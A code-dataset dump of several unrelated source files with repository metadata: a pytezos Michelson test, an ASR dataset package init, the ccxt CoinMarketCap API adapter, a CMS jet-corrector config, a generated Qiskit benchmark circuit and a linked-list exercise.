# NOTE(review): these module-level values appear unused — the test class in
# this file hard-codes its own fixture/entrypoint names. Confirm before
# removing; they look like leftovers from a templated test generator.
folder = 'dexter_usdtz_xtz'
entrypoint = 'removeLiquidity'
class MainnetOperationTestCaseGBWIFG(TestCase):
    """Round-trip tests for a recorded mainnet ``setWhiteListing`` operation
    against the contract script stored in JSON fixtures next to this file."""
    @classmethod
    def setUpClass(cls):
        """Load the contract script and the recorded operation fixture.

        NOTE(review): the f'' path component is empty — os.path.join skips
        empty segments, so it is a no-op; likely a templating leftover.
        """
        with open(join(dirname(__file__), f'', '__script__.json')) as f:
            script = json.loads(f.read())
        cls.program = MichelsonProgram.match(script['code'])
        with open(join(dirname(__file__), f'', f'setWhiteListing.json')) as f:
            operation = json.loads(f.read())
        cls.entrypoint = f'setWhiteListing'
        cls.operation = operation
        # cls.maxDiff = None
    def test_parameters_gbwifg(self):
        """Parameters survive a decode -> re-encode (readable mode) round trip."""
        original_params = self.program.parameter.from_parameters(self.operation['parameters'])
        py_obj = original_params.to_python_object()
        # pprint(py_obj)
        readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
        self.assertEqual(py_obj, readable_params.to_python_object())
        self.program.parameter.from_python_object(py_obj)
    def test_lazy_storage_gbwifg(self):
        """Storage merged with the big_map diff converts to a Python object."""
        storage = self.program.storage.from_micheline_value(self.operation['storage'])
        lazy_diff = big_map_diff_to_lazy_diff(self.operation['big_map_diff'])
        extended_storage = storage.merge_lazy_diff(lazy_diff)
        py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
        # pprint(py_obj)
    def test_parameters_forging(self):
        """Micheline parameters survive a forge -> unforge round trip."""
        expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
        actual = unforge_micheline(forge_micheline(expected))
        self.assertEqual(expected, actual)
| 39.333333 | 112 | 0.724047 | from unittest import TestCase
from os.path import dirname, join
import json
from pytezos.michelson.program import MichelsonProgram
from pytezos.michelson.types.big_map import big_map_diff_to_lazy_diff
from pytezos.michelson.forge import forge_micheline, unforge_micheline
folder = 'dexter_usdtz_xtz'
entrypoint = 'removeLiquidity'
class MainnetOperationTestCaseGBWIFG(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'setWhiteListing.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'setWhiteListing'
cls.operation = operation
def test_parameters_gbwifg(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_gbwifg(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_diff = big_map_diff_to_lazy_diff(self.operation['big_map_diff'])
extended_storage = storage.merge_lazy_diff(lazy_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
| true | true |
1c3cae4502ee75c7b7c37cdf55564728c019dcec | 518 | py | Python | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | espresso/data/__init__.py | dendisuhubdy/espresso | 7085f757e984e2d1ea93807991c1a46479bfc618 | [
"MIT"
] | null | null | null | # Copyright (c) Yiming Wang
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .asr_dataset import AsrDataset
from .asr_dictionary import AsrDictionary
from .feat_text_dataset import (
AsrTextDataset,
FeatScpCachedDataset,
FeatScpDataset,
FeatScpInMemoryDataset,
)
# Public API of espresso.data: the ASR dataset/dictionary helpers
# re-exported from the submodules above.
__all__ = [
    'AsrDataset',
    'AsrDictionary',
    'AsrTextDataset',
    'FeatScpCachedDataset',
    'FeatScpDataset',
    'FeatScpInMemoryDataset',
]
| 22.521739 | 65 | 0.737452 |
from .asr_dataset import AsrDataset
from .asr_dictionary import AsrDictionary
from .feat_text_dataset import (
AsrTextDataset,
FeatScpCachedDataset,
FeatScpDataset,
FeatScpInMemoryDataset,
)
__all__ = [
'AsrDataset',
'AsrDictionary',
'AsrTextDataset',
'FeatScpCachedDataset',
'FeatScpDataset',
'FeatScpInMemoryDataset',
]
| true | true |
1c3cae7a04ed48a7722897ae9024e5eca9692bd2 | 9,726 | py | Python | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 73 | 2018-05-15T00:53:50.000Z | 2022-03-07T14:45:11.000Z | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 20 | 2018-05-15T08:46:45.000Z | 2018-06-19T08:49:27.000Z | python/ccxt/coinmarketcap.py | voBits/ccxt | edd2dd92053bd06232769a63465a43912b21eda0 | [
"MIT"
] | 11 | 2018-05-15T00:09:30.000Z | 2022-03-07T14:45:27.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
class coinmarketcap (Exchange):
    """ccxt adapter for the CoinMarketCap public data API.

    CoinMarketCap is a data aggregator, not an exchange: only ticker /
    global / currency listings are supported; there is no trading,
    order-book or private API.
    """
    def describe(self):
        """Return the static capability/endpoint description merged over the
        base Exchange description."""
        return self.deep_extend(super(coinmarketcap, self).describe(), {
            'id': 'coinmarketcap',
            'name': 'CoinMarketCap',
            'rateLimit': 10000,
            'version': 'v1',
            'countries': 'US',
            'has': {
                'CORS': True,
                'privateAPI': False,
                'createOrder': False,
                'createMarketOrder': False,
                'createLimitOrder': False,
                'cancelOrder': False,
                'editOrder': False,
                'fetchBalance': False,
                'fetchOrderBook': False,
                'fetchOHLCV': False,
                'fetchTrades': False,
                'fetchTickers': True,
                'fetchCurrencies': True,
            },
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/28244244-9be6312a-69ed-11e7-99c1-7c1797275265.jpg',
                'api': {
                    'public': 'https://api.coinmarketcap.com',
                    'files': 'https://files.coinmarketcap.com',
                    'charts': 'https://graph.coinmarketcap.com',
                },
                'www': 'https://coinmarketcap.com',
                'doc': 'https://coinmarketcap.com/api',
            },
            'requiredCredentials': {
                'apiKey': False,
                'secret': False,
            },
            'api': {
                'files': {
                    'get': [
                        'generated/stats/global.json',
                    ],
                },
                'graphs': {
                    'get': [
                        'currencies/{name}/',
                    ],
                },
                'public': {
                    'get': [
                        'ticker/',
                        'ticker/{id}/',
                        'global/',
                    ],
                },
            },
            # Quote currencies the ticker endpoint can convert prices into.
            'currencyCodes': [
                'AUD',
                'BRL',
                'CAD',
                'CHF',
                'CNY',
                'EUR',
                'GBP',
                'HKD',
                'IDR',
                'INR',
                'JPY',
                'KRW',
                'MXN',
                'RUB',
                'USD',
            ],
        })
    def fetch_order_book(self, symbol, limit=None, params={}):
        """Always raises: CoinMarketCap has no order-book endpoint."""
        raise ExchangeError('Fetching order books is not supported by the API of ' + self.id)
    def currency_code(self, base, name):
        """Map a CoinMarketCap listing to a unified currency code.

        Entries mapping a name to itself pin that display name as the code;
        'MIOTA' is remapped to the code most exchanges use. Falls back to
        the listing's own symbol (``base``).
        """
        currencies = {
            'ACChain': 'ACChain',
            'AdCoin': 'AdCoin',
            'BatCoin': 'BatCoin',
            'Bitgem': 'Bitgem',
            'BlazeCoin': 'BlazeCoin',
            'BlockCAT': 'BlockCAT',
            'Catcoin': 'Catcoin',
            'Hi Mutual Society': 'Hi Mutual Society',
            'iCoin': 'iCoin',
            'Maggie': 'Maggie',
            'MIOTA': 'IOTA',  # a special case, most exchanges list it as IOTA, therefore we change just the Coinmarketcap instead of changing them all
            'NetCoin': 'NetCoin',
            'Polcoin': 'Polcoin',
        }
        if name in currencies:
            return currencies[name]
        return base
    def fetch_markets(self):
        """Build the market list: every listed coin crossed with every
        supported quote currency (base/quote pseudo-pairs)."""
        markets = self.publicGetTicker({
            'limit': 0,
        })
        result = []
        for p in range(0, len(markets)):
            market = markets[p]
            currencies = self.currencyCodes
            for i in range(0, len(currencies)):
                quote = currencies[i]
                quoteId = quote.lower()
                baseId = market['id']
                base = self.currency_code(market['symbol'], market['name'])
                symbol = base + '/' + quote
                id = baseId + '/' + quoteId
                result.append({
                    'id': id,
                    'symbol': symbol,
                    'base': base,
                    'quote': quote,
                    'baseId': baseId,
                    'quoteId': quoteId,
                    'info': market,
                })
        return result
    def fetch_global(self, currency='USD'):
        """Fetch global market statistics, optionally converted to ``currency``."""
        self.load_markets()
        request = {}
        if currency:
            request['convert'] = currency
        return self.publicGetGlobal(request)
    def parse_ticker(self, ticker, market=None):
        """Convert a raw CoinMarketCap ticker dict into the unified ccxt
        ticker structure. Price/volume keys are quote-currency specific
        (e.g. 'price_usd'), so ``market`` is needed to extract them."""
        timestamp = self.milliseconds()
        if 'last_updated' in ticker:
            if ticker['last_updated']:
                timestamp = int(ticker['last_updated']) * 1000
        change = None
        if 'percent_change_24h' in ticker:
            if ticker['percent_change_24h']:
                change = self.safe_float(ticker, 'percent_change_24h')
        last = None
        symbol = None
        volume = None
        if market:
            priceKey = 'price_' + market['quoteId']
            if priceKey in ticker:
                if ticker[priceKey]:
                    last = self.safe_float(ticker, priceKey)
            symbol = market['symbol']
            volumeKey = '24h_volume_' + market['quoteId']
            if volumeKey in ticker:
                if ticker[volumeKey]:
                    volume = self.safe_float(ticker, volumeKey)
        return {
            'symbol': symbol,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'high': None,
            'low': None,
            'bid': None,
            'bidVolume': None,
            'ask': None,
            'askVolume': None,
            'vwap': None,
            'open': None,
            'close': last,
            'last': last,
            'previousClose': None,
            'change': change,
            'percentage': None,
            'average': None,
            'baseVolume': None,
            'quoteVolume': volume,
            'info': ticker,
        }
    def fetch_tickers(self, currency='USD', params={}):
        """Fetch all tickers converted to ``currency``, keyed by unified
        symbol (or by raw id for listings without a known market)."""
        self.load_markets()
        request = {
            'limit': 10000,
        }
        if currency:
            request['convert'] = currency
        response = self.publicGetTicker(self.extend(request, params))
        tickers = {}
        for t in range(0, len(response)):
            ticker = response[t]
            currencyId = self.currencies[currency]['id'] if (currency in list(self.currencies.keys())) else currency.lower()
            id = ticker['id'] + '/' + currencyId
            symbol = id
            market = None
            if id in self.markets_by_id:
                market = self.markets_by_id[id]
                symbol = market['symbol']
            tickers[symbol] = self.parse_ticker(ticker, market)
        return tickers
    def fetch_ticker(self, symbol, params={}):
        """Fetch a single ticker for ``symbol``, converted to its quote."""
        self.load_markets()
        market = self.market(symbol)
        request = self.extend({
            'convert': market['quote'],
            'id': market['baseId'],
        }, params)
        response = self.publicGetTickerId(request)
        ticker = response[0]
        return self.parse_ticker(ticker, market)
    def fetch_currencies(self, params={}):
        """Fetch all listed currencies as unified currency structures."""
        currencies = self.publicGetTicker(self.extend({
            'limit': 0,
        }, params))
        result = {}
        for i in range(0, len(currencies)):
            currency = currencies[i]
            id = currency['symbol']
            name = currency['name']
            # todo: will need to rethink the fees
            # to add support for multiple withdrawal/deposit methods and
            # differentiated fees for each particular method
            precision = 8  # default precision, todo: fix "magic constants"
            code = self.currency_code(id, name)
            result[code] = {
                'id': id,
                'code': code,
                'info': currency,
                'name': name,
                'active': True,
                'status': 'ok',
                'fee': None,  # todo: redesign
                'precision': precision,
                'limits': {
                    'amount': {
                        'min': math.pow(10, -precision),
                        'max': math.pow(10, precision),
                    },
                    'price': {
                        'min': math.pow(10, -precision),
                        'max': math.pow(10, precision),
                    },
                    'cost': {
                        'min': None,
                        'max': None,
                    },
                    'withdraw': {
                        'min': None,
                        'max': None,
                    },
                },
            }
        return result
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the request URL; the public API needs no authentication."""
        url = self.urls['api'][api] + '/' + self.version + '/' + self.implode_params(path, params)
        query = self.omit(params, self.extract_params(path))
        if query:
            url += '?' + self.urlencode(query)
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
    def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Perform the request and raise ExchangeError on an API-level error."""
        response = self.fetch2(path, api, method, params, headers, body)
        if 'error' in response:
            if response['error']:
                raise ExchangeError(self.id + ' ' + self.json(response))
        return response
| 35.111913 | 151 | 0.451676 |
ge import Exchange
import math
from ccxt.base.errors import ExchangeError
class coinmarketcap (Exchange):
def describe(self):
return self.deep_extend(super(coinmarketcap, self).describe(), {
'id': 'coinmarketcap',
'name': 'CoinMarketCap',
'rateLimit': 10000,
'version': 'v1',
'countries': 'US',
'has': {
'CORS': True,
'privateAPI': False,
'createOrder': False,
'createMarketOrder': False,
'createLimitOrder': False,
'cancelOrder': False,
'editOrder': False,
'fetchBalance': False,
'fetchOrderBook': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchTickers': True,
'fetchCurrencies': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28244244-9be6312a-69ed-11e7-99c1-7c1797275265.jpg',
'api': {
'public': 'https://api.coinmarketcap.com',
'files': 'https://files.coinmarketcap.com',
'charts': 'https://graph.coinmarketcap.com',
},
'www': 'https://coinmarketcap.com',
'doc': 'https://coinmarketcap.com/api',
},
'requiredCredentials': {
'apiKey': False,
'secret': False,
},
'api': {
'files': {
'get': [
'generated/stats/global.json',
],
},
'graphs': {
'get': [
'currencies/{name}/',
],
},
'public': {
'get': [
'ticker/',
'ticker/{id}/',
'global/',
],
},
},
'currencyCodes': [
'AUD',
'BRL',
'CAD',
'CHF',
'CNY',
'EUR',
'GBP',
'HKD',
'IDR',
'INR',
'JPY',
'KRW',
'MXN',
'RUB',
'USD',
],
})
def fetch_order_book(self, symbol, limit=None, params={}):
raise ExchangeError('Fetching order books is not supported by the API of ' + self.id)
def currency_code(self, base, name):
currencies = {
'ACChain': 'ACChain',
'AdCoin': 'AdCoin',
'BatCoin': 'BatCoin',
'Bitgem': 'Bitgem',
'BlazeCoin': 'BlazeCoin',
'BlockCAT': 'BlockCAT',
'Catcoin': 'Catcoin',
'Hi Mutual Society': 'Hi Mutual Society',
'iCoin': 'iCoin',
'Maggie': 'Maggie',
'MIOTA': 'IOTA',
'NetCoin': 'NetCoin',
'Polcoin': 'Polcoin',
}
if name in currencies:
return currencies[name]
return base
def fetch_markets(self):
markets = self.publicGetTicker({
'limit': 0,
})
result = []
for p in range(0, len(markets)):
market = markets[p]
currencies = self.currencyCodes
for i in range(0, len(currencies)):
quote = currencies[i]
quoteId = quote.lower()
baseId = market['id']
base = self.currency_code(market['symbol'], market['name'])
symbol = base + '/' + quote
id = baseId + '/' + quoteId
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_global(self, currency='USD'):
self.load_markets()
request = {}
if currency:
request['convert'] = currency
return self.publicGetGlobal(request)
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
if 'last_updated' in ticker:
if ticker['last_updated']:
timestamp = int(ticker['last_updated']) * 1000
change = None
if 'percent_change_24h' in ticker:
if ticker['percent_change_24h']:
change = self.safe_float(ticker, 'percent_change_24h')
last = None
symbol = None
volume = None
if market:
priceKey = 'price_' + market['quoteId']
if priceKey in ticker:
if ticker[priceKey]:
last = self.safe_float(ticker, priceKey)
symbol = market['symbol']
volumeKey = '24h_volume_' + market['quoteId']
if volumeKey in ticker:
if ticker[volumeKey]:
volume = self.safe_float(ticker, volumeKey)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': volume,
'info': ticker,
}
def fetch_tickers(self, currency='USD', params={}):
self.load_markets()
request = {
'limit': 10000,
}
if currency:
request['convert'] = currency
response = self.publicGetTicker(self.extend(request, params))
tickers = {}
for t in range(0, len(response)):
ticker = response[t]
currencyId = self.currencies[currency]['id'] if (currency in list(self.currencies.keys())) else currency.lower()
id = ticker['id'] + '/' + currencyId
symbol = id
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
tickers[symbol] = self.parse_ticker(ticker, market)
return tickers
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = self.extend({
'convert': market['quote'],
'id': market['baseId'],
}, params)
response = self.publicGetTickerId(request)
ticker = response[0]
return self.parse_ticker(ticker, market)
def fetch_currencies(self, params={}):
currencies = self.publicGetTicker(self.extend({
'limit': 0,
}, params))
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = currency['symbol']
name = currency['name']
precision = 8
code = self.currency_code(id, name)
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': True,
'status': 'ok',
'fee': None,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'withdraw': {
'min': None,
'max': None,
},
},
}
return result
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
if response['error']:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| true | true |
1c3caf08ced27c0e5cd877306734982c58b8fdb5 | 239 | py | Python | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:24:46.000Z | 2021-11-30T16:24:46.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 4 | 2021-11-29T13:57:56.000Z | 2022-03-29T06:28:36.000Z | HLTrigger/Configuration/python/HLT_75e33/modules/hltAK4PFPuppiJetCorrectorL2_cfi.py | PKUfudawei/cmssw | 8fbb5ce74398269c8a32956d7c7943766770c093 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:16:05.000Z | 2021-11-30T16:16:05.000Z | import FWCore.ParameterSet.Config as cms
hltAK4PFPuppiJetCorrectorL2 = cms.EDProducer("LXXXCorrectorProducer",
#algorithm = cms.string('AK4PFPuppiHLT'),
algorithm = cms.string('AK4PFPuppi'),
level = cms.string('L2Relative')
)
| 29.875 | 69 | 0.748954 | import FWCore.ParameterSet.Config as cms
hltAK4PFPuppiJetCorrectorL2 = cms.EDProducer("LXXXCorrectorProducer",
algorithm = cms.string('AK4PFPuppi'),
level = cms.string('L2Relative')
)
| true | true |
1c3caf13a1646674626907addf5a607e3d1ada06 | 4,408 | py | Python | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startQiskit_QC2807.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
    """Position-wise XOR of two equal-length bit strings, with the result's
    characters emitted in reverse order."""
    n = len(s)
    return ''.join(str(int(s[k]) ^ int(t[k])) for k in range(n - 1, -1, -1))
def bitwise_dot(s: str, t: str) -> str:
    """Inner product of two bit strings modulo 2, returned as '0' or '1'."""
    total = sum(int(s[k]) * int(t[k]) for k in range(len(s)))
    return str(total % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the oracle O_f as an (n+1)-qubit circuit.

    For every n-bit assignment on which ``f`` evaluates to "1", a
    multi-controlled Toffoli ('noancilla' mode) flips the target qubit;
    X gates conjugate the control qubits that should match '0'.
    """
    controls = QuantumRegister(n, "ofc")
    target = QuantumRegister(1, "oft")
    oracle = QuantumCircuit(controls, target, name="Of")
    for value in range(2 ** n):
        pattern = np.binary_repr(value, n)
        if f(pattern) != "1":
            continue
        # Controls whose bit is '0' must be inverted around the Toffoli.
        inverted = [controls[j] for j in range(n) if pattern[j] == "0"]
        for qubit in inverted:
            oracle.x(qubit)
        oracle.mct(controls, target[0], None, mode='noancilla')
        for qubit in inverted:
            oracle.x(qubit)
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Assemble the n-qubit benchmark circuit: a fixed generator-produced
    gate prelude, the oracle for ``f`` on the first n-1 qubits, a fixed
    postlude, and a measurement of every qubit.

    The ``# number=...`` trailing comments are gate indices assigned by the
    circuit generator; the exact gate order is significant, so the sequence
    is kept verbatim.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.cx(input_qubit[0],input_qubit[3]) # number=13
    prog.h(input_qubit[3]) # number=23
    prog.cz(input_qubit[0],input_qubit[3]) # number=24
    prog.y(input_qubit[1]) # number=37
    prog.h(input_qubit[3]) # number=25
    prog.x(input_qubit[3]) # number=18
    prog.cx(input_qubit[0],input_qubit[3]) # number=19
    prog.cx(input_qubit[0],input_qubit[3]) # number=15
    prog.h(input_qubit[1])  # number=2
    prog.h(input_qubit[2])  # number=3
    prog.h(input_qubit[3])  # number=4
    prog.y(input_qubit[3])  # number=12
    prog.h(input_qubit[0])  # number=5
    oracle = build_oracle(n-1, f)
    prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
    prog.h(input_qubit[1])  # number=6
    prog.h(input_qubit[2])  # number=7
    prog.h(input_qubit[3])  # number=32
    prog.cx(input_qubit[3],input_qubit[0]) # number=20
    prog.cx(input_qubit[3],input_qubit[0]) # number=26
    prog.z(input_qubit[3]) # number=27
    prog.h(input_qubit[0]) # number=29
    prog.cz(input_qubit[3],input_qubit[0]) # number=30
    prog.h(input_qubit[0]) # number=31
    prog.h(input_qubit[0]) # number=33
    prog.cz(input_qubit[3],input_qubit[0]) # number=34
    prog.h(input_qubit[0]) # number=35
    prog.h(input_qubit[2]) # number=36
    prog.h(input_qubit[3]) # number=8
    prog.h(input_qubit[0]) # number=9
    prog.y(input_qubit[2]) # number=10
    prog.y(input_qubit[2]) # number=11
    prog.y(input_qubit[1]) # number=38
    prog.y(input_qubit[1]) # number=39
    # circuit end
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])
    return prog
if __name__ == '__main__':
    a = "111"
    b = "0"
    # Bernstein-Vazirani-style oracle: f(x) = (a . x) XOR b.
    f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
    prog = make_circuit(4,f)
    # Run on the least-busy real IBMQ device with at least 2 qubits.
    IBMQ.load_account()
    provider = IBMQ.get_provider(hub='ibm-q')
    provider.backends()
    backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
    sample_shot =8000
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    # Transpile against a mock backend only to report the compiled length.
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)
    # Dump measurement counts and the transpiled circuit to a CSV report.
    writefile = open("../data/startQiskit_QC2807.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.__len__(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
| 35.264 | 165 | 0.655172 |
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[3])
prog.cz(input_qubit[0],input_qubit[3])
prog.y(input_qubit[1])
prog.h(input_qubit[3])
prog.x(input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.cx(input_qubit[0],input_qubit[3])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.y(input_qubit[3])
prog.h(input_qubit[0])
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.cx(input_qubit[3],input_qubit[0])
prog.cx(input_qubit[3],input_qubit[0])
prog.z(input_qubit[3])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[0])
prog.cz(input_qubit[3],input_qubit[0])
prog.h(input_qubit[0])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
prog.h(input_qubit[0])
prog.y(input_qubit[2])
prog.y(input_qubit[2])
prog.y(input_qubit[1])
prog.y(input_qubit[1])
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC2807.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| true | true |
1c3cb0095cb31ff4dd18af04d18443ae107f4042 | 528 | py | Python | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | chapter_2/2.3.py | frbaroni/ctci | ff2f308aae76ab0e3dde09c7f88f37b86073cb38 | [
"MIT"
] | null | null | null | import unittest
from mylist import LinkedList
def deleteElement(node):
    """Remove *node* from its singly linked list given only the node itself,
    by copying the successor's payload and link into it (CTCI 2.3).
    Undefined for the tail node, which has no successor to copy."""
    successor = node.next
    node.data = successor.data
    node.next = successor.next
class Playground(unittest.TestCase):
    """Tests for deleteElement.

    Bug fix: both methods were previously named ``test_1``, so the second
    definition shadowed the first and the middle-node case never ran.
    """
    def test_delete_middle(self):
        # Deleting the middle node [2] leaves [1, 3].
        A = LinkedList.create([1, 2, 3])
        E = [1, 3]
        deleteElement(A.next)
        self.assertEqual(A.toList(), E)
    def test_delete_head(self):
        # Deleting the head node [1] leaves [2, 3].
        A = LinkedList.create([1, 2, 3])
        E = [2, 3]
        deleteElement(A)
        self.assertEqual(A.toList(), E)
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
| 22.956522 | 40 | 0.589015 | import unittest
from mylist import LinkedList
def deleteElement(node):
node.data = node.next.data
node.next = node.next.next
class Playground(unittest.TestCase):
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [1, 3]
deleteElement(A.next)
self.assertEqual(A.toList(), E)
def test_1(self):
A = LinkedList.create([1, 2, 3])
E = [2, 3]
deleteElement(A)
self.assertEqual(A.toList(), E)
if __name__ == '__main__':
unittest.main()
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.